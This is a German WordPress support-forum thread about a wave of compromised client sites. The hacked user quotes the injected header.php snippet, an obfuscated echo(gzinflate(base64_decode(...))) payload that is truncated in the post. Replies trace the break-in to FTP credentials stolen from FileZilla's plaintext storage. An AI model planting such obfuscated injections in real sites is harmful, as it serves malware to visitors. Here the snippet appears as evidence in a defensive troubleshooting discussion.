Support » Allgemeine Fragen » Websites hacked: header.php ethält schadhaften code

  • Hallo,

    in den letzen 2 Tagen wurden fast alle meiner Kunden-Webs gehackt, diese befinden sich aber bei 4 verschiedenen Providern.

    Es ist überall die aktuellste WordPress-Version, auch die Plugins sind alle am neusten Stand.

    Es wurde in allen installierten Themes die header.php manipuliert, so dass schadhafter Code beim browsen ausgeführt wird. Es handelt sich dabei, wie üblich, um einen Trojaner (blackhole):

    Hier der betroffene Codeschnipsel:

    <?php
    #c3284d#
    echo(gzinflate(base64_decode("1VpLc9s2EP4t1UmqxzYA...
    .../4Hd/8B")));
    #/c3284d#
    wp_head(); ?>

    Ist diese Methode bekannt, wie kann ich das zukünftig verhindern? Reicht ein Plugin wie „Better WP Security“, oder liegt das Problem eine Etage tiefer wie zB beim Provider (apache/mysql leaks)?

    Die Provider wurden natürlich kontaktiert, Antwort steht noch aus. Die letzte attacke war gestern um ca. 20:40-20:43, und es wurden auch Websites infiziert, wo KEIN WordPress vorhanden ist, dort wurden alle *.html Dateien infiziert (anderer code, aber ca. selbe Uhrzeit)

    LG
    alexander

Ansicht von 3 Antworten - 1 bis 3 (von insgesamt 3)
  • Was sind denn die Gemeinsamkeiten? Mir fallen da spontan ein
    – Plesk ohne neuste Updates
    – keylogger/sniffer auf deinem Rechner, so das ein Angreifer die FTP Daten abhören konnte.
    – überall identische Kennwörter
    – auch ohne CMS, evt ein WYSIWYG Editor der Filesysemzugriffe erlaubt.

    Hast du durch Logfiles schon rausgefunden wie die Daten geändert wurden? FTP upload, Editor der Verwaltungssoftware (Plesk), Editor im Webspace.

    Gruß
    Frank

    Hallo Frank

    Ja, es war anscheinend ein Trojaner/Keylogger, der mir einige FTP-Passwörter geklaut hat. Vielleicht wurden aber auch die Einstellungen vom Filezilla irgendwie kopiert, da auch Websites betroffen waren, die dort eingetragen sind, aber schon seit Monaten von mir nicht mehr besucht wurden, was eher gegen einen keylogger spricht.

    Zugriff war auf allen Websites per FTP, brute force o.ä. wäre dem Provider aufgefallen, war angeblich nix…

    Jetzt ist auf den Webs zusätzlich das Plugin „Better WP Security“ installert, das alarmiert auch bei Dateiänderungen.

    lg
    akex

    Kurzer Hinweis:

    Filezilla speichert alle FTP Wörter im Klartext. Es war sicher kein Keylooger ( wer loggt sich an gleichen Tag schon in alle existierenden Webseiten ein…?) das war ein Trojaner der deine Passwörter im Klartext ausgelesen hat.
    Wer für Kunden Webseiten anfertigt sollte niemanls FTP Programme benutzen die Passwörter unverschlüsselt lokal auf die Festplatte speichern.
    Ich empfehle hier WinSCP oder andere FTP Clients.

Ansicht von 3 Antworten - 1 bis 3 (von insgesamt 3)
  • Das Thema „Websites hacked: header.php ethält schadhaften code“ ist für neue Antworten geschlossen.